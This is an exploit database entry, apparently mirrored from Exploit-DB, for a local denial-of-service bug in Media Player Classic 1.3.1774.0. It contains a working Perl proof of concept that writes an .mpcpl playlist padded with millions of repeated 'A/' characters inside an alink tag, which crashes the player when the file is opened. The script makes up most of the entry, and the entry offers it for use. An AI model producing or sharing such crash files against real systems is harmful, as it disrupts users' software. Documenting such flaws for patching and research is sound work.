Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local Denial of Service PoC

vendor:

Media Player Classic

by:

R3d-D3v!L

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Media Player Classic

Affected Version From: V1.3.1774.0

Affected Version To: V1.3.1774.0

Patch Exists: NO

Related CWE: N/A

CPE: a:media_player_classic:media_player_classic

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2020

Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local Denial of Service PoC

This exploit is a proof of concept for a local denial of service vulnerability in Media Player Classic V1.3.1774.0. The exploit is triggered by creating a malicious .mpcpl file containing a large number of alink tags. When the file is opened in Media Player Classic, the application will crash due to the large size of the file.

Mitigation:

The best way to mitigate this vulnerability is to avoid opening untrusted .mpcpl files.

Source

Exploit-DB raw data:

#!\C:\Perl\bin
##################################{In The Name Of Allah The Mercifull}######################

# Title : Media Player Classic V1.3.1774.0 (mpcpl) 0day suffer from local Denial of Service PoC

# Tested : Windows xp (sp3)

# AUThoR: R3d-D3v!L

# Credits to : XP10_HACKER ((XP10.ME-xp10.com))

print qq(
########################################################
## Media Player Classic V1.3.1774.0 0day suffer from local Denial of Service PoC ##
## Credits : XP10.ME ##
## XP10_HACKER ##
## Author : R3d-D3v!L <X[at]hotmail.co.jp> ##
## Greetz : DR_DAShER & JUPA ##
## all member at XP10.ME ##
########################################################
);

$XP10_hacker="\nbody {alink: "."A/" x 8000000 ."}\n";
open(file ,'>>X.mpcpl');
print file $XP10_hacker;
print "CODED BY R3d-D3V!L~#\n";
close(file);